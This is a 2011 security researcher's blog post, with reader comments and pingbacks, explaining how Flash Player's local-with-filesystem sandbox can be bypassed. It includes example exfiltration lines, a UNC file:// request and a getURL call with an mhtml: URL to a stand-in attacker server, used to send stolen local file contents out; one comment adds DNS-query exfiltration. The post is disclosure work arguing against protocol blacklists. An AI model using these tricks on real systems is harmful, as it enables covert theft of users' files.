Monday, January 3, 2011

Bypassing Flash’s local-with-filesystem Sandbox

A few weeks ago, I posted a description of a set of bugs that could be chained together to do “bad things”.  In the PoC I provided, a SWF file reads an arbitrary file from the victim's local file system and passes the stolen content to an attacker's server.

One of the readers (PZ) had a question about the SWFs local-with-filesystem sandbox, which should prevent SWFs loaded from the local file system from passing data to remote systems.  Looking at the documentation related to the sandbox, we see the following:
Local file describes any file that is referenced by using the file: protocol or a Universal Naming Convention (UNC) path. Local SWF files are placed into one of four local sandboxes:

The local-with-filesystem sandbox—For security purposes, Flash Player places all local SWF files and assets in the local-with-file-system sandbox, by default. From this sandbox, SWF files can read local files (by using the URLLoader class, for example), but they cannot communicate with the network in any way. This assures the user that local data cannot be leaked out to the network or otherwise inappropriately shared.

First, I think the documentation here is a bit too generous.  SWFs loaded from the local file system do face some restrictions.  The most relevant restrictions are probably:

  1. The SWF cannot make a call to JavaScript (or vbscript), either through URL or ExternalInterface

  2. The SWF cannot call a HTTP or HTTPS request.

  3. Querystring parameters (ex. Blah.php?querystring=qs-value) are stripped and will not be passed (even for requests to local files)


Unfortunately, these restrictions are not the same as, “cannot communicate with the network in any way” which is what is stated in the documentation.  The simplest way to bypass the local-with-filesystem sandbox is to simply use a file:// request to a remote server.  For example, after loading the content from the local file system an attacker can simply pass the contents to the attacker server via getURL() and a url like:  file://\\192.168.1.1\stolen-data-here\

Fortunately, it seems you can only pass IPs and hostnames for system on the local network (RFC 1918 addresses).  If an attacker wants to send data to a remote server on the Internet we’ll have to resort to a couple other tricks.  A while back, I put up a post on the dangers of blacklisting protocol handlers.  It's basically impossible to create a list of "bad" protocol handlers in siutation like this.  In the case of the local-with-filesystem sandbox, Adobe has decided to prevent network access through the use of protocol handler blacklists.  If we can find a protocol handler that hasn’t been blacklisted by Adobe and allows for network communication, we win. 

There are a large number of protocol handlers that meet the criteria outlined in the previous sentence, but we’ll use the mhtml protocol handler as an example.  The mhtml protocol handler is available on modern Windows systems, can be used without any prompts, and is not blacklisted by Flash.  Using the mhtml protocol handler, it’s easy to bypass the Flash sandbox:

getURL('mhtml:http://attacker-server.com/stolen-data-here', '');

Some other benefits for using the mhtml protocol handler are:

  1. The request goes over http/https and port 80/443 so it will get past most egress filtering

  2. If the request results in a 404, it will silently fail.  The data will still be transmitted to the attackers server, but the victim will never see an indication of the transfer

  3. The protocol handler is available by default on Win7 and will launch with no protocol handler warning


There you go, an easy way to bypass Flash’s local-with-file system sandbox.  Two lessons here.  One, running un-trusted code (whether it’s an executable, javascript, or even a swf) is dangerous.  Two, protocol handler blacklists are bad.  Hope this helps PZ!
Posted by at
Labels:

27 comments:

  1. Gareth HeyesJanuary 3, 2011 at 9:58 PM

    Sweet, you are a schemer dude :D

    ReplyDelete
  2. lavaJanuary 4, 2011 at 11:14 PM

    I did some work on this sometime back and also released a Whitepaper [http://www.andlabs.org/whitepapers/F_IE_PrisonBreak.pdf] and a tool which extracted files from the harddisk. But I used the more simpler method - \\192.168.1.1\stolen-data-here\

    Using mhtml is a very clever approach!

    Couple of points:
    1) This still requires the attacker to have some kind of access to the internal network since the Flash file must be loaded from within the LAN. In this case does being able to send the output to a remote system have any clear advantage?

    2) Someone who read my whitepaper sent me an e-mail mentioning that he was able to send the data to remote systems using DNS tunneling. Am wondering if this would work since you mention that only hostnames from local network can be called. Any thoughts?

    Thanks.

    ReplyDelete
  3. HDJanuary 5, 2011 at 3:39 AM

    A fun trick I use for exfiltrating data from Java is the gethostname() call. The sandbox prevents the caller from seeing the results of the lookup, but it doesn't prevent the lookup from occurring. You can send any data you like out via DNS queries from a sandboxed Java applet. We used this in the Decloak.net code today.

    ReplyDelete
  4. benJanuary 5, 2011 at 12:50 PM

    I recently research some flash security,but when I public the swf to the web,it couldn't visit local files.Could you send me the .fla?

    ReplyDelete
  5. Flash Player sandbox can be bypassedJanuary 5, 2011 at 11:20 PM

    [...] not be able to send local data to a remote server. However, Security specialist Billy Rios has determined that Adobe controls access to the network using a blacklist of protocol handlers. Protocols such as [...]

    ReplyDelete
  6. .:: Securnetwork.net Blog – Massimo Rabbi ::. » Macromedia Flash: occhio al filesystem!January 6, 2011 at 1:58 AM

    [...] - Bypassing Flash’s local-with-filesystem Sandbox, sul blog di Billy (BK) Rios - Flash Player Security Basics - Security Domains, Application [...]

    ReplyDelete
  7. Bypass Flash Player SandboxJanuary 6, 2011 at 3:31 AM

    [...] the security researcher, Billy Rios has discovered that Adobe controls access to the network using a blacklist of protocols such as HTTP and HTTPS. [...]

    ReplyDelete
  8. Why Blacklist Destinations? « Aggressive Virus DefenseJanuary 6, 2011 at 12:56 PM

    [...] adds are easy), hard to maintain (but when should entries be removed?) measure. (See also: How Adobe blacklisted certain URL prefixes when implementing its local-with-filesystem-sandbox, but failed [...]

    ReplyDelete
  9. Sandbox van Flash is te omzeilen. | celar.nlJanuary 6, 2011 at 5:09 PM

    [...] beveiligingsonderzoeker Billy Rios heeft een prove-of-concept gepresenteerd die laat zien dat het mogelijk is om via Flash toegang te krijgen tot lokale [...]

    ReplyDelete
  10. باحث أمني يتوصل إلى طريقة لتجاوز الـ Sandbox الخاص بـ Flash Player | المجلة التقنيةJanuary 6, 2011 at 10:57 PM

    [...] الباحث الأمني Billy Rios على مدونته POC)  Proof of Concept) لإمكانية تجاوز حماية الـ Sandbox التي [...]

    ReplyDelete
  11. Researcher breaks security sandbox in Adobe Flash bypassing security with mhtmlJanuary 7, 2011 at 5:54 AM

    [...] Player that's designed to harden it against hack attacks. Billy Rios, a Google researcher who published the method on his personal website, said it circumvents the local-with-filesystem sandbox, which is supposed [...]

    ReplyDelete
  12. Information: Researcher breaks security sandbox in Adobe | DhanyWeb.comJanuary 7, 2011 at 1:27 PM

    [...] Rios, a Google researcher who published the method on his personal website, said it circumvents the local-with-filesystem sandbox, which is supposed [...]

    ReplyDelete
  13. Security researcher finds way around Flash sandbox | World newsJanuary 8, 2011 at 11:57 PM

    [...] Rios, a researcher who is a security engineer for Microsoft, published on his personal blog a way to get around Flash Player’s local-within-filesystem [...]

    ReplyDelete
  14. Descubren un método para hackear archivos de Adobe Flash « Logic Security 2.0January 9, 2011 at 8:12 AM

    [...] Rios, experto en seguridad informática de Microsoft, explicó en su blog los pasos necesarios para poder esquivar sandbox y desveló el método que podría permitir a los [...]

    ReplyDelete
  15. Researcher Bypasses Flash Sandbox Security | eWEEK Europe UKJanuary 10, 2011 at 12:30 AM

    [...] to application security researcher Billy Rios, there is a way to bypass the local-with-filesystem sandbox utilised in Adobe Flash [...]

    ReplyDelete
  16. Bypass the Security Sandbox! « Domy IncorporationJanuary 10, 2011 at 8:32 PM

    [...] when we try to test something locally, before upload it to the server. Anyways,  we have Mr. Billy Rios, a Security Researcher who discovered “an easy way to bypass Flash’s local-with-file [...]

    ReplyDelete
  17. Descubierta la primera vulnerabilidad de Adobe Reader X en Bitelia (Multimedia)January 10, 2011 at 10:17 PM

    [...] sistema y en la implementación del sandbox para mejorar la seguridad del producto.Según publica en su blog, el experto en seguridad Billy Rios, el famoso sandbox de Adobe es vulnerable. En palabras del [...]

    ReplyDelete
  18. Adobe Circus: Another Flash In The PanJanuary 10, 2011 at 11:02 PM

    [...] Player that’s designed to harden it against hack attacks. Billy Rios, a Google researcher who published the method on his personal website, said it circumvents the local-with-filesystem sandbox, which is supposed [...]

    ReplyDelete
  19. Descubierta la primera vulnerabilidad de Adobe Reader X « BNJanuary 11, 2011 at 12:01 AM

    [...] publica en su blog, el experto en seguridad Billy Rios, el famoso sandbox de Adobe es vulnerable. En palabras del [...]

    ReplyDelete
  20. Исследователь взломал песочницу Adobe FlashJanuary 11, 2011 at 7:07 AM

    [...] Adobe Flash Player. Билли Риос, исследователь компании Google, опубликовавший данный метод на своем собственном сайт..., сообщил, что благодаря этому методу возможно обойти [...]

    ReplyDelete
  21. Исследователь взломал песочницу Adobe Flash « Serval_MasterJanuary 11, 2011 at 7:19 AM

    [...] Adobe Flash Player. Билли Риос, исследователь компании Google, опубликовавший данный метод на своем собственном сайт..., сообщил, что благодаря этому методу возможно обойти [...]

    ReplyDelete
  22. Security researcher finds way around Flash sandbox |January 11, 2011 at 2:29 PM

    [...] Rios, a researcher who is a security engineer for Microsoft, published on his personal blog a way to get around Flash Player’s local-within-filesystem [...]

    ReplyDelete
  23. Tom RJanuary 11, 2011 at 8:52 PM

    So, er, at the moment, do you think it's better to stick with 9.4.1 (current setup) or better to move to X? Or something else entirely?

    ReplyDelete
  24. IISB 01/13/2011January 13, 2011 at 8:25 AM

    [...] Billy (BK) Rios » Bypassing Flash’s local-with-filesystem Sandbox [...]

    ReplyDelete
  25. Adobe’s Flash Sandbox Not So Secure After AllJanuary 14, 2011 at 8:00 PM

    [...] which has been introduced in December 2010 is not as effective as it could be. Security researcher Billy Rios discovered a way to bypass Adobe’s Flash Player sandbox locally.He found out that SWFs that [...]

    ReplyDelete
  26. superheiJanuary 14, 2011 at 8:53 PM

    http://www.80vul.com/mhtml/Hacking%20with%20mhtml%20protocol%20handler.txt

    ReplyDelete
  27. Allan SmithieJanuary 17, 2011 at 1:04 AM

    this is bunk

    file://\\192.168.1.1\stolen-data-here\

    and

    mhtml:http://attacker-server.com/stolen-data-here

    will throw a streamerror with or without sandbox
    with a URLRequest.

    These are just invalid urls and dont do a thing.

    and by the way the getURL method you are using is as2 and will just open a browser window which will probaly also fail to parse the urls.

    You just put some fancy security terminology together to make a blogpost.

    At least have the guts to provide us some serious sourcefiles or examplecode to look at.

    ReplyDelete

Subscribe to: Post Comments (Atom)